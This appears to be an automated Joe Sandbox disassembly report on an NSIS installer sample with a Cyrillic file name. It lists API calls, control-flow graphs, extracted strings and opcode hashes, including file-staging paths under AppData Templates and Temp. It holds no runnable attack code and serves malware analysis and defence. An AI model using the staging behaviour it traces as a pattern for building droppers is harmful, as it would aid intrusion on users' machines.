                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                    • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                                                    • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (image not preserved; the graph begins at block 403d58-403d6a)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                    • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                                                    • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (image not preserved; the graph begins at block 4039aa-4039c2)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A2B
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula), ref: 00403B12
                                                                                                                                                                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                    • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                                                                                    • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                    • API String ID: 1975747703-686753906
                                                                                                                                                                                                                    • Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                                                    • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 440 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 443 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 440->443 444 402f2d-402f32 440->444 452 403052-403060 call 402e79 443->452 453 402f6b 443->453 445 40310f-403113 444->445 459 403062-403065 452->459 460 4030b5-4030ba 452->460 455 402f70-402f87 453->455 457 402f89 455->457 458 402f8b-402f94 call 403331 455->458 457->458 466 402f9a-402fa1 458->466 467 4030bc-4030c4 call 402e79 458->467 462 403067-40307f call 403347 call 403331 459->462 463 403089-4030b3 GlobalAlloc call 403347 call 403116 459->463 460->445 462->460 490 403081-403087 462->490 463->460 488 4030c6-4030d7 463->488 472 402fa3-402fb7 call 405d6b 466->472 473 40301d-403021 466->473 467->460 478 40302b-403031 472->478 487 402fb9-402fc0 472->487 477 403023-40302a call 402e79 473->477 473->478 477->478 484 403040-40304a 478->484 485 403033-40303d call 406787 478->485 484->455 489 403050 484->489 485->484 487->478 493 402fc2-402fc9 487->493 494 4030d9 488->494 495 4030df-4030e4 488->495 489->452 490->460 490->463 493->478 496 402fcb-402fd2 493->496 494->495 497 4030e5-4030eb 495->497 496->478 498 402fd4-402fdb 496->498 497->497 499 4030ed-403108 SetFilePointer call 405d6b 497->499 498->478 500 402fdd-402ffd 498->500 503 40310d 499->503 500->460 502 403003-403007 500->502 504 403009-40300d 502->504 505 40300f-403017 502->505 503->445 504->489 504->505 505->478 506 403019-40301b 505->506 506->478
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 00402EDD
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                                                                                                                                    • soft, xrefs: 00402FCB
                                                                                                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                                                                                                                                    • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                                                    • Inst, xrefs: 00402FC2
                                                                                                                                                                                                                    • C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                                                    • Null, xrefs: 00402FD4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                    • API String ID: 4283519449-621050810
                                                                                                                                                                                                                    • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                    • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 720 4062dc-4062e7 721 4062e9-4062f8 720->721 722 4062fa-406310 720->722 721->722 723 406316-406323 722->723 724 406528-40652e 722->724 723->724 725 406329-406330 723->725 726 406534-40653f 724->726 727 406335-406342 724->727 725->724 729 406541-406545 call 4062ba 726->729 730 40654a-40654b 726->730 727->726 728 406348-406354 727->728 731 406515 728->731 732 40635a-406398 728->732 729->730 736 406523-406526 731->736 737 406517-406521 731->737 734 4064b8-4064bc 732->734 735 40639e-4063a9 732->735 740 4064be-4064c4 734->740 741 4064ef-4064f3 734->741 738 4063c2 735->738 739 4063ab-4063b0 735->739 736->724 737->724 747 4063c9-4063d0 738->747 739->738 744 4063b2-4063b5 739->744 745 4064d4-4064e0 call 4062ba 740->745 746 4064c6-4064d2 call 406201 740->746 742 406502-406513 lstrlenW 741->742 743 4064f5-4064fd call 4062dc 741->743 742->724 743->742 744->738 749 4063b7-4063ba 744->749 758 4064e5-4064eb 745->758 746->758 751 4063d2-4063d4 747->751 752 4063d5-4063d7 747->752 749->738 754 4063bc-4063c0 749->754 751->752 756 406412-406415 752->756 757 4063d9-406400 call 406188 752->757 754->747 759 406425-406428 756->759 760 406417-406423 GetSystemDirectoryW 756->760 769 4064a0-4064a3 757->769 770 406406-40640d call 4062dc 757->770 758->742 762 4064ed 758->762 765 406493-406495 759->765 766 40642a-406438 GetWindowsDirectoryW 759->766 764 406497-40649b 760->764 763 4064b0-4064b6 call 40654e 762->763 763->742 764->763 771 40649d 764->771 765->764 768 40643a-406444 765->768 766->765 776 406446-406449 768->776 777 40645e-406474 SHGetSpecialFolderLocation 768->777 769->763 774 4064a5-4064ab lstrcatW 769->774 770->764 771->769 774->763 776->777 779 40644b-406452 776->779 780 406476-40648d SHGetPathFromIDListW CoTaskMemFree 777->780 781 40648f 777->781 782 
40645a-40645c 779->782 780->764 780->781 781->765 782->764 782->777
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405359,0041DA00,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(0041DA00,Call), ref: 0040647A
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(0041DA00), ref: 00406485
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                    • API String ID: 717251189-1230650788
                                                                                                                                                                                                                    • Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                                                    • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Grundlovssikrende36 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp$C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns$Call
                                                                                                                                                                                                                    • API String ID: 1941528284-2936285393
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                                                    • String ID: ... %d%%$@
                                                                                                                                                                                                                    • API String ID: 551687249-3859443358
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                      • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 1022 406624-406644 GetSystemDirectoryW 1023 406646 1022->1023 1024 406648-40664a 1022->1024 1023->1024 1025 40665b-40665d 1024->1025 1026 40664c-406655 1024->1026 1028 40665e-406691 wsprintfW LoadLibraryExW 1025->1028 1026->1025 1027 406657-406659 1026->1027 1027->1028
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 1029 4057f1-40583c CreateDirectoryW 1030 405842-40584f GetLastError 1029->1030 1031 40583e-405840 1029->1031 1032 405869-40586b 1030->1032 1033 405851-405865 SetFileSecurityW 1030->1033 1031->1032 1033->1031 1034 405867 GetLastError 1033->1034 1034->1032
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                    • API String ID: 3449924974-3370423016
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 1035 405ddf-405deb 1036 405dec-405e20 GetTickCount GetTempFileNameW 1035->1036 1037 405e22-405e24 1036->1037 1038 405e2f-405e31 1036->1038 1037->1036 1039 405e26 1037->1039 1040 405e29-405e2c 1038->1040 1039->1040
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9), ref: 00405E18
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 00405DDF
                                                                                                                                                                                                                    • nsa, xrefs: 00405DEC
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                    • API String ID: 1716503409-1190130691
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F261B5F: GlobalFree.KERNEL32(?), ref: 6F261DB2
                                                                                                                                                                                                                      • Part of subcall function 6F261B5F: GlobalFree.KERNEL32(?), ref: 6F261DB7
                                                                                                                                                                                                                      • Part of subcall function 6F261B5F: GlobalFree.KERNEL32(?), ref: 6F261DBC
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261825
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6F2618AB
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2618D0
                                                                                                                                                                                                                      • Part of subcall function 6F262352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F262383
                                                                                                                                                                                                                      • Part of subcall function 6F262724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F2617F6,00000000), ref: 6F2627F4
                                                                                                                                                                                                                      • Part of subcall function 6F2615C6: wsprintfW.USER32 ref: 6F2615F4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmp
